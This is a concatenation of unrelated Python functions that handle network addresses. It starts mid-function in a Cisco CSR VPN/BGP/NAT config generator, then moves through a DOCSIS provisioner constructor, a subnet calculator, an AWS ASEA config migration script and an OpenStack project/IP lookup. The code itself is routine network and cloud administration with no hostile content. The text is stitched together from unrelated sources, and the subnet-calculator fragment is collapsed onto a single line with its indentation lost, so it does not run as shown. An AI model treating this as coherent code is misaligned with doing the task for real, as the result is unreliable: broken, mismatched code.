                config_text.append(' neighbor {} route-map rm-{} out'.format(
                    vpn_gateway_tunnel_inside_address_ip_address,
                    vpn_connection_id))
            config_text.append(' neighbor {} timers 10 30 30'.format(
                vpn_gateway_tunnel_inside_address_ip_address))
            config_text.append(' neighbor {} activate'.format(
                vpn_gateway_tunnel_inside_address_ip_address))
            config_text.append(' neighbor {} as-override'.format(
                vpn_gateway_tunnel_inside_address_ip_address))
            config_text.append(
                ' neighbor {} soft-reconfiguration inbound'.format(
                    vpn_gateway_tunnel_inside_address_ip_address))
            config_text.append(' neighbor {} next-hop-self'.format(
                vpn_gateway_tunnel_inside_address_ip_address))
            config_text.append('exit')
            config_text.append('exit')

            # the following configuration adds internet routing
            # (default route + NAT for the spoke VPC through this CSR).
            vpn_gateway_id = getVpnGatewayIdFromVpnConnectionId(
                vpn_connection_id)
            vpc_id = getVpcIdFromVpnGatewayId(vpn_gateway_id)
            spoke_cidr = getVpcSpokeCidrFromVpcId(vpc_id)
            n = ipaddress.IPv4Network(spoke_cidr.decode('utf-8'))
            spoke_ip = str(n.network_address)
            spoke_hostmask = str(n.hostmask)
            csr_subnet_id = getSubnetIdFromPublicIpAddress(
                customer_gateway_tunnel_outside_address)
            csr_cidr = getSubnetCidrFromSubnetId(csr_subnet_id)
            n = ipaddress.IPv4Network(csr_cidr.decode('utf-8'))
            # First usable address of the CSR subnet is the VPC router.
            csr_default_gateway_ip = str(n[1])
            config_text.append(
                'router bgp {}'.format(customer_gateway_bgp_asn))
            config_text.append(
                ' address-family ipv4 vrf {}'.format(vpn_connection_id))
            config_text.append(' network 0.0.0.0')
            config_text.append('exit')
            config_text.append('exit')
            config_text.append(
                'ip route vrf {} 0.0.0.0 0.0.0.0 {} global'.format(
                    vpn_connection_id, csr_default_gateway_ip))
            config_text.append('ip access-list standard {}'.format(vpc_id))
            config_text.append(' 10 permit {} {}'.format(
                spoke_ip, spoke_hostmask))
            config_text.append('exit')
            config_text.append('interface GigabitEthernet1')
            config_text.append(' ip nat outside')
            config_text.append('exit')
            config_text.append('interface Tunnel{}'.format(tunnelId))
            config_text.append(' ip nat inside')
            config_text.append('exit')
            config_text.append(
                'ip nat inside source list {} interface GigabitEthernet1 vrf {} overload'
                .format(vpc_id, vpn_connection_id))

            #Increment tunnel ID for going onto the next tunnel
            tunnelId += 1

    log.debug("Conversion complete")
    return config_text
def __init__(self, *args, **kwargs):
    """Configure the provisioner's networks/addresses from kwargs.

    Every option is consumed with kwargs.pop() so defaults apply when a
    key is absent; remaining kwargs are forwarded to the parent class.
    NOTE(review): reads self.ipv6_prefix, which must be defined on the
    class (or set before this runs) — confirm against the class body.
    """
    # Cable-modem (CM) provisioning network / gateway.
    self.cm_network = ipaddress.IPv4Network(
        kwargs.pop('cm_network', u"192.168.200.0/24"))
    self.cm_gateway = ipaddress.IPv4Address(
        kwargs.pop('cm_gateway', u"192.168.200.1"))
    # MTA (voice) network / gateway.
    self.mta_network = ipaddress.IPv4Network(
        kwargs.pop('mta_network', u"192.168.201.0/24"))
    self.mta_gateway = ipaddress.IPv4Address(
        kwargs.pop('mta_gateway', u"192.168.201.1"))
    # Open (unrestricted) network / gateway.
    self.open_network = ipaddress.IPv4Network(
        kwargs.pop('open_network', u"192.168.202.0/24"))
    self.open_gateway = ipaddress.IPv4Address(
        kwargs.pop('open_gateway', u"192.168.202.1"))
    # Provisioning network: the provisioner's own address and gateway.
    self.prov_network = ipaddress.IPv4Network(
        kwargs.pop('prov_network', u"192.168.3.0/24"))
    self.prov_gateway = ipaddress.IPv4Address(
        kwargs.pop('prov_gateway', u"192.168.3.222"))
    self.prov_ip = ipaddress.IPv4Address(
        kwargs.pop('prov_ip', u"192.168.3.1"))

    # IPv6 provisioning interface; split into address + network below.
    self.prov_iface = ipaddress.IPv6Interface(
        kwargs.pop('prov_ipv6',
                   u"2001:dead:beef:1::1/%s" % self.ipv6_prefix))
    self.prov_ipv6, self.prov_nw_ipv6 = self.prov_iface.ip, self.prov_iface.network

    # IPv6 CM gateway plus the DHCPv6 address-pool bounds for the CM net.
    self.cm_gateway_v6_iface = ipaddress.IPv6Interface(
        kwargs.pop('cm_gateway_v6',
                   u"2001:dead:beef:4::cafe/%s" % self.ipv6_prefix))
    self.cm_gateway_v6, self.cm_network_v6 = self.cm_gateway_v6_iface.ip, self.cm_gateway_v6_iface.network
    self.cm_network_v6_start = ipaddress.IPv6Address(
        kwargs.pop('cm_network_v6_start', u"2001:dead:beef:4::10"))
    self.cm_network_v6_end = ipaddress.IPv6Address(
        kwargs.pop('cm_network_v6_end', u"2001:dead:beef:4::100"))

    # IPv6 open-network gateway plus its address-pool bounds.
    self.open_gateway_iface = ipaddress.IPv6Interface(
        kwargs.pop('open_gateway_v6',
                   u"2001:dead:beef:6::cafe/%s" % self.ipv6_prefix))
    self.open_gateway_v6, self.open_network_v6 = self.open_gateway_iface.ip, self.open_gateway_iface.network
    self.open_network_v6_start = ipaddress.IPv6Address(
        kwargs.pop('open_network_v6_start', u"2001:dead:beef:6::10"))
    self.open_network_v6_end = ipaddress.IPv6Address(
        kwargs.pop('open_network_v6_end', u"2001:dead:beef:6::100"))
    self.prov_gateway_v6 = ipaddress.IPv6Address(
        kwargs.pop('prov_gateway_v6', u"2001:dead:beef:1::cafe"))

    # we're storing a list of all /56 subnets possible from erouter_net_iface.
    # As per docsis, /56 must be the default pd length
    self.erouter_net_iface = ipaddress.IPv6Interface(
        kwargs.pop('erouter_net', u"2001:dead:beef:e000::/51"))
    self.erouter_net = list(
        self.erouter_net_iface.network.subnets(
            56 - self.erouter_net_iface._prefixlen))

    # SIP FQDN encoded as DHCP option-style colon-separated hex bytes.
    self.sip_fqdn = kwargs.pop(
        'sip_fqdn', u"08:54:43:4F:4D:4C:41:42:53:03:43:4F:4D:00")
    # Time/syslog servers default to the provisioner itself.
    self.time_server = ipaddress.IPv4Address(
        kwargs.pop('time_server', self.prov_ip))
    self.timezone = self.get_timzone_offset(kwargs.pop('timezone', u"UTC"))
    self.syslog_server = ipaddress.IPv4Address(
        kwargs.pop('syslog_server', self.prov_ip))

    # Comma-separated feature flags; 'options' is deliberately NOT popped,
    # so the parent class can also see it.
    if 'options' in kwargs:
        options = [x.strip() for x in kwargs['options'].split(',')]
        for opt in options:
            # Not a well supported config, will go away at some point
            if opt.startswith('wan-cmts-provisioner'):
                self.wan_cmts_provisioner = True
                self.shared_tftp_server = True
                # This does run one.. but it's handled via the provisioning code path
                self.standalone_provisioner = False

    # Convenience aliases used elsewhere.
    self.gw = self.prov_ip
    self.gwv6 = self.prov_ipv6
    self.nw = self.prov_network
    return super(DebianISCProvisioner, self).__init__(*args, **kwargs)
# ----------------------------------------------------------------------------------------NET netDec = str(subnet(ipDec, maskDec)) netBin = numbersToBin(netDec.split(".")) print("\nNetwork decimal:", netDec) file.write("\nNetwork decimal: " + str(netDec) + "\n") print("Network binary:", combineTabToString(netBin)) file.write("Network binary: " + str(combineTabToString(netBin)) + "\n") print("Network class:", ipclass(ip)) file.write("Network class: " + str(ipclass(ip)) + "\n") print("Network type:", publicOrPrivate(ip)) file.write("Network type: " + str(publicOrPrivate(ip)) + "\n") # ----------------------------------------------------------------------------------------BROADCAST broadcastDec = str( ipaddress.IPv4Network(ipDec + '/' + maskDec, False).broadcast_address) broadcastBin = numbersToBin(broadcastDec.split(".")) print("\nBroadcast decimal:", broadcastDec) file.write("\nBroadcast decimal: " + str(broadcastDec) + "\n") print("Broadcast binary:", combineTabToString(broadcastBin)) file.write("Broadcast binary: " + str(combineTabToString(broadcastBin)) + "\n") # ----------------------------------------------------------------------------------------FIRST-HOST firstHostSingle = splittingToSingleNumbers(netBin) i = -1 while firstHostSingle[i] == 1 and i <= -numberOfHostBits: firstHostSingle[i] = 0 i -= 1 firstHostSingle[i] = 1 firstHostBin = combingToBinary(firstHostSingle) firstHostDec = binaryToDecimal(firstHostBin)
def impl(accel_prefix, config_file, region, load_db, load_config):
    """Convert an ASEA configuration file to the updated accelerator layout.

    The input JSON is pretty-printed to 'prettier-config.json', optionally
    loaded into DynamoDB, and (unless load_config is falsy) rewritten
    section by section and saved as 'update-config.json'.  As a final step
    the output file is post-processed with plain-text replacements that
    rename the 'core' OU to 'Security' and 'aws-org-master' to
    'aws-org-management'.

    Args:
        accel_prefix: Accelerator prefix, forwarded to load_to_ddb().
        config_file: Path to the JSON configuration file to convert.
        region: AWS region, forwarded to load_to_ddb().
        load_db: When truthy, load the (unconverted) config into DynamoDB.
        load_config: When falsy, stop after the optional DynamoDB load.
    """
    with open(config_file) as f:
        config = json.load(f)
    # Keep a pretty-printed copy of the original input for reference.
    with open('prettier-config.json', 'w') as f:
        json.dump(config, f, indent=2)
    if load_db:
        load_to_ddb(accel_prefix, region, config)
    if not load_config:
        return
    print("Converting Configuration file with respect to updated accelerator")
    # NOTE(review): config_sections is not defined in this function --
    # presumably a module-level mapping of the known top-level sections.
    for config_section in config_sections.keys():
        if config_section == 'global-options':
            print('Updating global options')
            global_key_configs = config[config_section]
            # Drop the obsolete alz-baseline flag whenever it is present
            # as an explicit boolean (True or False).
            if config[config_section].get('alz-baseline') == False or config[
                    config_section].get('alz-baseline') == True:
                del config[config_section]['alz-baseline']
            for key_name in global_key_configs:
                ## This section will get renamed to aws-org-management
                if key_name == 'aws-org-master':
                    config[config_section][key_name]['add-sns-topics'] = True
                if key_name == 'central-security-services':
                    config[config_section][key_name][
                        'macie-sensitive-sh'] = True
                    config[config_section][key_name][
                        'fw-mgr-alert-level'] = "Low"
                    config[config_section][key_name][
                        'security-hub-findings-sns'] = "Low"
                    config[config_section][key_name]['add-sns-topics'] = True
                if key_name == 'cloudwatch':
                    # Add two CloudTrail-based metric filters (authorization
                    # failures and console sign-in without MFA) ...
                    config[config_section][key_name]['metrics'].append({
                        'filter-name': 'IgnoreAuthorizationFailureMetric',
                        'accounts': ["management"],
                        'regions': ["${HOME_REGION}"],
                        'loggroup-name': '/${ACCELERATOR_PREFIX_ND}/CloudTrail',
                        'filter-pattern': '{($.errorCode=\"*UnauthorizedOperation\") || ($.errorCode=\"AccessDenied*\")}',
                        'metric-namespace': 'CloudTrailMetrics',
                        'metric-name': 'IgnoreAuthorizationFailureCount',
                        'metric-value': '1'
                    })
                    config[config_section][key_name]['metrics'].append({
                        'filter-name': 'IgnoreConsoleSignInWithoutMfaMetric',
                        'accounts': ["management"],
                        'regions': ["${HOME_REGION}"],
                        'loggroup-name': '/${ACCELERATOR_PREFIX_ND}/CloudTrail',
                        'filter-pattern': '{($.eventName=\"ConsoleLogin\") && ($.additionalEventData.MFAUsed !=\"Yes\")}',
                        'metric-namespace': 'CloudTrailMetrics',
                        'metric-name': 'IgnoreConsoleSignInWithoutMfaCount',
                        'metric-value': '1'
                    })
                    # ... and the matching alarm definitions for them.
                    config[config_section][key_name]['alarms'][
                        'default-in-org-mgmt-use-lcl-sns'] = True
                    config[config_section][key_name]['alarms'][
                        'definitions'].append({
                            'alarm-name': 'IGNORE-AWS-Authorization-Failure',
                            'metric-name': 'IgnoreAuthorizationFailureCount',
                            'sns-alert-level': 'Ignore',
                            'alarm-description':
                            'Alarms when one or more unauthorized API calls are made (in any account, any region of your AWS Organization).'
                        })
                    config[config_section][key_name]['alarms'][
                        'definitions'].append({
                            'alarm-name': 'IGNORE-AWS-Console-SignIn-Without-MFA',
                            'metric-name': 'IgnoreConsoleSignInWithoutMfaCount',
                            'sns-alert-level': 'Ignore',
                            'alarm-description':
                            'Alarms when MFA is NOT used to sign into the console with IAM (in any account, any region of your AWS Organization).'
                        })
                if key_name == 'aws-config':
                    # Pin the Lambda runtime for the custom config rules.
                    rules = config[config_section][key_name]['rules']
                    for rule in rules:
                        if rule['name'] == 'EC2-INSTANCE-PROFILE':
                            rule['runtime'] = 'nodejs14.x'
                        if rule['name'] == 'EC2-INSTANCE-PROFILE-PERMISSIONS':
                            rule['runtime'] = 'nodejs14.x'
                if key_name == 'scps':
                    # Split Guardrails Part 0 into a core-OU and a
                    # workload-OU variant; Part 2 is retired.
                    scp_list = config[config_section][key_name]
                    scp_list.append({
                        'name': 'Guardrails-Part-0-Core',
                        'description': 'ASEA Guardrails Part 0 Core Accounts',
                        'policy': 'ASEA-Guardrails-Part0-CoreOUs.json',
                    })
                    for idx, scp in enumerate(scp_list):
                        if scp['name'] == 'Guardrails-Part-0':
                            scp['description'] = 'ASEA Guardrails Part 0 Workload Accounts'
                            scp['policy'] = 'ASEA-Guardrails-Part0-WkldOUs.json'
                        if scp['name'] == 'Guardrails-Part-2':
                            # NOTE(review): deleting scp_list[idx] while
                            # enumerating shifts later indices, so the entry
                            # right after the deleted one is skipped --
                            # confirm Guardrails-Part-2 is the last entry.
                            del config[config_section][key_name][idx]
                if key_name == 'security-hub-frameworks':
                    standards_list = config[config_section][key_name][
                        'standards']
                    for standard in standards_list:
                        if standard[
                                'name'] == 'AWS Foundational Security Best Practices v1.0.0':
                            standard['controls-to-disable'] = [
                                "IAM.1", "EC2.10", "Lambda.4"
                            ]
                        if standard[
                                'name'] == 'CIS AWS Foundations Benchmark v1.2.0':
                            standard['controls-to-disable'] = [
                                "CIS.1.20", "CIS.1.22", "CIS.2.6"
                            ]
        if config_section == 'mandatory-account-configs':
            print('Updating mandatory account configs')
            mandatory_key_configs = config[config_section]
            for key_name in mandatory_key_configs:
                # Strip empty-string placeholder values from ALB configs.
                alb_list = config[config_section][key_name].get('alb')
                if alb_list:
                    for alb in alb_list:
                        if alb.get('tg-stickiness') == "":
                            del alb['tg-stickiness']
                        target_list = alb['targets']
                        for target in target_list:
                            if target.get('lambda-filename') == "":
                                del target['lambda-filename']
                if config[config_section][key_name].get(
                        'share-mad-from') == "":
                    del config[config_section][key_name]['share-mad-from']
                if key_name == 'shared-network':
                    config[config_section][key_name][
                        'description'] = 'This Account is used for centralized or shared networking resources.'
                    config[config_section][key_name]['ou'] = 'Infrastructure'
                    vpc_list = config[config_section][key_name].get('vpc')
                    if (vpc_list):
                        for vpc in vpc_list:
                            if vpc['name'] == 'Endpoint':
                                vpc['description'] = 'This VPC is used to host AWS Service Endpoints, making AWS services available using private address space.'
                if key_name == 'operations':
                    config[config_section][key_name][
                        'description'] = 'This Account is used for centralized IT Operational resources (MAD, rsyslog, ITSM, etc.).'
                    if 'mad' in config[config_section][key_name][
                            'deployments']:
                        config[config_section][key_name]['deployments']['mad'][
                            'description'] = 'This directory is a) shared to most accounts in the organization to provide centralized Windows and Linux authentication for cloud workloads, b) used as an identity source for AWS SSO, c) used to inter-connect with on-premises directory services, and d) provides a single identities source for instance and AWS console access.'
                        config[config_section][key_name]['deployments']['mad'][
                            'image-path'] = '/aws/service/ami-windows-latest/Windows_Server-2016-English-Full-Base'
                        config[config_section][key_name][
                            'ou'] = 'Infrastructure'
                        if config[config_section][key_name]['deployments'][
                                'mad'].get('share-to-account') == "":
                            del config[config_section][key_name][
                                'deployments']['mad']['share-to-account']
                if key_name == 'perimeter':
                    config[config_section][key_name][
                        'description'] = 'This Account is used for internet facing ingress/egress security services.'
                    config[config_section][key_name]['ou'] = 'Infrastructure'
                    firewall_list = config[config_section][key_name][
                        'deployments'].get('firewalls')
                    if (firewall_list):
                        for firewall in firewall_list:
                            firewall['block-device-mappings'] = [
                                "/dev/sda1", "/dev/sdb"
                            ]
                    if (config[config_section][key_name]['deployments'].get(
                            'firewall-manager')):
                        config[config_section][key_name]['deployments'][
                            'firewall-manager']['block-device-mappings'] = [
                                "/dev/sda1", "/dev/sdb"
                            ]
                    vpc_list = config[config_section][key_name].get('vpc')
                    if (vpc_list):
                        for vpc in vpc_list:
                            if vpc['name'] == 'Perimeter':
                                vpc['description'] = 'This VPC is used to hold centralized ingress/egress (perimeter) security services.'
                                vpc['alb-forwarding'] = True
                if key_name == 'management':
                    config[config_section][key_name][
                        'description'] = 'This is the Organization Management or root account. Access must be highly restricted. This account should not contain customer resources.'
                    config[config_section][key_name]['ou'] = 'Security'
                    vpc_list = config[config_section][key_name].get('vpc')
                    if (vpc_list):
                        for vpc in vpc_list:
                            if vpc['name'] == 'ForSSO':
                                vpc['description'] = 'This VPC is deployed in the Organization Management/root account to enable the deployment of the Active Directory Connector, enabling the use of Active Directory as the Identity source for AWS SSO.'
                if key_name == 'log-archive':
                    config[config_section][key_name]['ou'] = 'Security'
                    config[config_section][key_name][
                        'description'] = 'This Account is used to centralized and store immutable logs for the Organization.'
                if key_name == 'security':
                    config[config_section][key_name]['ou'] = 'Security'
                    config[config_section][key_name][
                        'description'] = 'This Account is used to centralized access to AWS security tooling and consoles.'
        if config_section == 'workload-account-configs' and config[
                config_section] != {}:
            print('Updating workload-account-configs')
            workload_key_configs = config[config_section]
            for key_name in workload_key_configs:
                alb_list = config[config_section][key_name].get('alb')
                if alb_list:
                    for alb in alb_list:
                        if alb.get('tg-stickiness') == "":
                            del alb['tg-stickiness']
                        target_list = alb['targets']
                        for target in target_list:
                            if target.get('lambda-filename') == "":
                                del target['lambda-filename']
                # NOTE(review): here any truthy share-mad-from is deleted,
                # while the other sections only delete it when it is "" --
                # confirm the asymmetry is intentional.
                if config[config_section][key_name].get('share-mad-from'):
                    del config[config_section][key_name]['share-mad-from']
        if config_section == 'organizational-units':
            print('Updating organizational-units')
            organizational_key_configs = config[config_section]
            for key_name in organizational_key_configs:
                alb_list = config[config_section][key_name].get('alb')
                if alb_list:
                    for alb in alb_list:
                        if alb.get('tg-stickiness') == "":
                            del alb['tg-stickiness']
                        target_list = alb['targets']
                        for target in target_list:
                            if target.get('lambda-filename') == "":
                                del target['lambda-filename']
                if config[config_section][key_name].get(
                        'share-mad-from') == "":
                    del config[config_section][key_name]['share-mad-from']
                scps = config[config_section][key_name].get('scps')
                # NOTE(review): this indexes ['scps'] directly before the
                # `if scps:` guard takes effect, so an OU without 'scps'
                # raises KeyError -- confirm every OU defines it.
                if 'Guardrails-Part-2' in config[config_section][key_name][
                        'scps']:
                    if scps:
                        config[config_section][key_name]['scps'].remove(
                            'Guardrails-Part-2')
                if key_name == 'core':
                    print('Updating Core OU')
                    ## The core OU will be renamed to Security and copied to create the Infrastructure OU
                    config[config_section][key_name][
                        'description'] = 'The Security OU is used to hold AWS accounts containing AWS security resources shared or utilized by the rest of the Organization.'
                    config[config_section][key_name]['scps'].remove(
                        'Guardrails-Part-0')
                    config[config_section][key_name]['scps'].append(
                        'Guardrails-Part-0-Core')
                elif key_name == 'Central':
                    config[config_section][key_name][
                        'description'] = 'The Central OU is used to hold AWS accounts which contain group or team resources used across OU boundaries like code promotion tools.'
                    vpc_list = config[config_section][key_name]['vpc']
                    for vpc in vpc_list:
                        if vpc['name'] == 'Central':
                            vpc['description'] = 'This VPC is deployed in the shared network account and it\'s subnets are shared out to the Operations account and every account in the Central OU.'
                else:
                    config[config_section][key_name][
                        'description'] = f'The {key_name} OU.'
                    vpc_list = config[config_section][key_name].get('vpc')
                    if vpc_list:
                        for vpc in vpc_list:
                            vpc['description'] = f'The {vpc["name"]} vpc in the {key_name} OU.'
            #create new infrastructure ou as a copy of core
            # NOTE(review): infra_ou aliases the 'core' dict (no copy), so
            # 'Infrastructure' and the renamed 'Security' OU share one
            # object -- these description/budget edits apply to both.
            if 'core' in config[config_section]:
                infra_ou = config[config_section]['core']
                infra_ou['default-budgets'][
                    'name'] = 'Default Infrastructure Budget'
                infra_ou['description'] = 'The Infrastructure OU'
                infra_ou[
                    'description'] = 'The infrastructure OU is used to hold AWS accounts containing AWS infrastructure resources shared or utilized by the rest of the Organization.'
                config[config_section]['Infrastructure'] = infra_ou
        ## Update vpc's and subnet's
        if (config_section == 'mandatory-account-configs'
                or config_section == 'workload-account-configs'
                or config_section == 'organizational-units'):
            # Defaults used for overlap checks below when the real CIDRs
            # are not discovered while walking the VPCs.
            forsso_cidr = "10.24.34.0/24"
            perimeter_rfc_cidr = "10.24.34.0/24"
            central_rfc_cidr = "10.24.34.0/24"
            key_configs = config[config_section]
            for key_name in key_configs:
                for vindex, vpcConfig in enumerate(key_configs[key_name].get(
                        'vpc', [])):
                    # A list-valued 'cidr' means this VPC was already
                    # migrated to the new pool-based format.
                    if type(config[config_section][key_name]['vpc'][vindex]
                            ['cidr']) == list:
                        print(
                            "Configuration for VPC %s is already in sync with updated SEA"
                            % vpcConfig['name'])
                        continue
                    print(
                        f'Updating vpc {config[config_section][key_name]["vpc"][vindex]["name"]}'
                    )
                    ## create main pool for cidr block
                    if (vpcConfig['deploy'] == 'local'
                            and vpcConfig['name'] == 'ForSSO'):
                        cidr_pool = 'ForSSO'
                        forsso_cidr = vpcConfig['cidr']
                    else:
                        cidr_pool = 'main'
                    config[config_section][key_name]['vpc'][vindex]['cidr'] = [
                        {
                            'value': vpcConfig['cidr'],
                            'size': int(vpcConfig['cidr'].split('/')[-1]),
                            'pool': cidr_pool,
                        }
                    ]
                    ## create pool for cidr2 block if it exists
                    if vpcConfig.get('cidr2'):
                        if type(vpcConfig['cidr2']) == list:
                            for cidr in vpcConfig['cidr2']:
                                if (vpcConfig['deploy'] == 'local'
                                        and vpcConfig['name'] == 'Perimeter'):
                                    cidr_pool = 'RFC6598b'
                                    perimeter_rfc_cidr = cidr
                                elif (vpcConfig['deploy'] == 'shared-network'
                                      and vpcConfig['name'] == 'Central'):
                                    cidr_pool = 'RFC6598a'
                                    central_rfc_cidr = cidr
                                else:
                                    # NOTE(review): 'pools' is not defined in
                                    # this function -- presumably a
                                    # module-level dict; verify.
                                    cidr_pool = pools['sub']
                                config[config_section][key_name]['vpc'][
                                    vindex]['cidr'].append({
                                        'value': cidr,
                                        'pool': cidr_pool,
                                        'size': int(cidr.split('/')[-1]),
                                    })
                        else:
                            if (vpcConfig['deploy'] == 'local'
                                    and vpcConfig['name'] == 'Perimeter'):
                                cidr_pool = 'RFC6598b'
                                perimeter_rfc_cidr = vpcConfig['cidr2']
                            elif (vpcConfig['deploy'] == 'shared-network'
                                  and vpcConfig['name'] == 'Central'):
                                cidr_pool = 'RFC6598a'
                                central_rfc_cidr = vpcConfig['cidr2']
                            else:
                                cidr_pool = pools['sub']
                            config[config_section][key_name]['vpc'][vindex][
                                'cidr'].append({
                                    'value': vpcConfig['cidr2'],
                                    'pool': cidr_pool,
                                    'size': int(vpcConfig['cidr2'].split('/')[-1]),
                                })
                        del config[config_section][key_name]['vpc'][vindex][
                            'cidr2']
                    ## add new keys and remove optional keys for vpc
                    config[config_section][key_name]['vpc'][vindex][
                        'cidr-src'] = 'provided'
                    if config[config_section][key_name]['vpc'][vindex].get(
                            'igw') == False:
                        del config[config_section][key_name]['vpc'][vindex][
                            'igw']
                    if not config[config_section][key_name]['vpc'][vindex][
                            'vgw']:
                        del config[config_section][key_name]['vpc'][vindex][
                            'vgw']
                    if not config[config_section][key_name]['vpc'][vindex][
                            'pcx']:
                        del config[config_section][key_name]['vpc'][vindex][
                            'pcx']
                    if not config[config_section][key_name]['vpc'][vindex][
                            'natgw']:
                        del config[config_section][key_name]['vpc'][vindex][
                            'natgw']
                    if 'tgw-attach' in config[config_section][key_name]['vpc'][
                            vindex]:
                        if not config[config_section][key_name]['vpc'][vindex][
                                'tgw-attach']:
                            del config[config_section][key_name]['vpc'][
                                vindex]['tgw-attach']
                    if 'interface-endpoints' in config[config_section][
                            key_name]['vpc'][vindex]:
                        if not config[config_section][key_name]['vpc'][vindex][
                                'interface-endpoints']:
                            del config[config_section][key_name]['vpc'][
                                vindex]['interface-endpoints']
                    ## update subnets in vpc
                    for sindex, subnetConfig in enumerate(
                            vpcConfig['subnets']):
                        for dindex, subnetDef in enumerate(
                                subnetConfig['definitions']):
                            current_cidr = subnetDef['cidr'] if subnetDef.get(
                                'cidr', None) else subnetDef['cidr2']
                            print(current_cidr)
                            print(subnetDef.get('cidr'))
                            #if config[config_section][key_name]['vpc'][vindex]['subnets'][sindex]['definitions']['route-table'] == 'CentralVPC_Common'
                            # config[config_section][key_name]['vpc'][vindex]['subnets'][sindex]['definitions']['route-table'] = '${CONFIG::VPC_NAME}VPC_Common'
                            # Assign the subnet to whichever pool its CIDR
                            # overlaps with, falling back to 'main'.
                            if (ipaddress.IPv4Network(current_cidr).overlaps(
                                    ipaddress.IPv4Network(perimeter_rfc_cidr))
                                ):
                                cidr_pool = 'RFC6598b'
                            elif (ipaddress.IPv4Network(current_cidr).overlaps(
                                    ipaddress.IPv4Network(central_rfc_cidr))):
                                cidr_pool = 'RFC6598a'
                            elif (ipaddress.IPv4Network(current_cidr).overlaps(
                                    ipaddress.IPv4Network(forsso_cidr))):
                                cidr_pool = 'ForSSO'
                            else:
                                cidr_pool = 'main'
                            config[config_section][key_name]['vpc'][vindex][
                                'subnets'][sindex]['definitions'][dindex][
                                    'cidr'] = {
                                        'value': current_cidr,
                                        'pool': cidr_pool,
                                        'size': int(current_cidr.split('/')[-1]),
                                    }
    with open('update-config.json', 'w') as f:
        json.dump(config, f, indent=2)
    # Post-process the emitted JSON as text to apply the two renames.
    with open('update-config.json') as f:
        s = f.read()
    with open('update-config.json', 'w') as f:
        s = s.replace('"core": {', '"Security": {')
        s = s.replace('aws-org-master', 'aws-org-management')
        f.write(s)
def populate_openstack_data(data):
    """Fetch all OpenStack data needed.

    Populates ``data['os']`` with:
      * ``projects``: project id -> {'name': ..., 'emails': {email: name}}
        for every keystone project, emails filled in from role assignments;
      * ``hosts``: IP address -> project id, for every neutron port or
        floating IP that falls inside one of the configured networks.

    When DEBUG is enabled the data is read from (and written back to) the
    DEBUG_OPENSTACK_DATA JSON cache file instead of querying the APIs.

    Exits the process with status 1 on any failed API call.
    """
    data['os'] = {}
    if DEBUG and os.path.isfile(DEBUG_OPENSTACK_DATA):
        print("Warning: DEBUG is enabled, reading openstack data from %s"
              % DEBUG_OPENSTACK_DATA)
        # Use a context manager so the cache file is always closed
        # (the previous code leaked the handle).
        with open(DEBUG_OPENSTACK_DATA, "r") as cache_file:
            data['os'] = json.load(cache_file)
    else:
        os_conf = data['config']['openstack']
        os_auth = v3.Password(auth_url=os_conf['url'],
                              username=os_conf['user'],
                              password=os_conf['password'],
                              project_name=os_conf['project'],
                              user_domain_name=os_conf['domain'],
                              project_domain_name=os_conf['domain'])
        os_sess = session.Session(auth=os_auth)
        headers = {'Accept': 'application/json'}
        keystone = keystone_client.Client(session=os_sess,
                                          connection_pool=True)
        # We need the ID of the domain.
        domains = {key.name: key.id for key in keystone.domains.list()}
        # We need all users (only those that have an email address are
        # useful for building the notification map).
        users = {
            key.id: {
                'name': key.name,
                'email': key.email
            }
            for key in keystone.users.list(
                domain=domains[os_conf['user_domain']])
            if hasattr(key, 'email')
        }
        # Find the neutron url through the service catalog.
        services = {
            service.name + '_' + service.type: service.id
            for service in keystone.services.list()
        }
        endpoints = {
            endpoint.service_id + '_' + endpoint.interface: endpoint.url
            for endpoint in keystone.endpoints.list()
        }
        neutron_url = endpoints[services['neutron_network'] + '_public']
        # Fetch project list, ID to project name
        data['os']['projects'] = {
            prj.id: {
                'name': prj.name,
                'emails': {}
            }
            for prj in keystone.projects.list()
        }
        # Fetch all role assignments and use that to figure out which users
        # belong to which project.
        # BUGFIX: the query parameter was missing its '=' sign
        # ('?scope.domain.id<value>'), so the domain filter was never
        # actually applied by keystone.
        response = keystone.session.get(
            os_conf['url'] + '/role_assignments?scope.domain.id=' +
            domains[data['config']['openstack']['user_domain']],
            headers=headers,
            authenticated=os_auth)
        if response.status_code != 200:
            print("Failed to list role_assignments!")
            exit(1)
        role_assignments = response.json()
        for entry in role_assignments['role_assignments']:
            if 'scope' in entry and 'user' in entry and 'project' in entry[
                    'scope']:
                user_id = entry['user']['id']
                project_id = entry['scope']['project']['id']
                if user_id in users:
                    email_entry = {
                        users[user_id]['email']: users[user_id]['name']
                    }
                    data['os']['projects'][project_id]['emails'].update(
                        email_entry)
        data['os']['hosts'] = {}
        # We need to know the networks to look for
        networks = []
        for netname in data['config']['networks']:
            networks.append(
                ipaddress.IPv4Network(data['config']['networks'][netname]))
        # Get floatingips list
        response = keystone.session.get(neutron_url + '/v2.0/floatingips',
                                        headers=headers,
                                        authenticated=os_auth)
        if response.status_code != 200:
            print("Failed to get floating IPs list!")
            exit(1)
        floatingips = response.json()['floatingips']
        # Get port list
        response = keystone.session.get(neutron_url + '/v2.0/ports',
                                        headers=headers,
                                        authenticated=os_auth)
        if response.status_code != 200:
            print("Failed to get the port list!")
            exit(1)
        # Combine them to one list.... Needs some work below though
        ports = response.json()['ports'] + floatingips
        for port in ports:
            if 'device_owner' in port:
                owner = port['device_owner']
                # Skip system IP:s, they are of no use to us
                if owner == 'network:floatingip' or owner == 'network:router_gateway':
                    continue
            project = port['project_id']
            if project == '':
                print('Project id is unknown, this should never happen!')
                pp.pprint(port)
                exit(1)
            # Record the address only if it belongs to one of the
            # configured networks.
            if 'floating_ip_address' in port:
                address = ipaddress.ip_address(port['floating_ip_address'])
                for network in networks:
                    if address in network:
                        data['os']['hosts'][
                            port['floating_ip_address']] = project
            else:
                for ip in port['fixed_ips']:
                    address = ipaddress.ip_address(ip['ip_address'])
                    for network in networks:
                        if address in network:
                            data['os']['hosts'][ip['ip_address']] = project
    if DEBUG:
        with open(DEBUG_OPENSTACK_DATA, "w") as cache_file:
            json.dump(data['os'], cache_file)
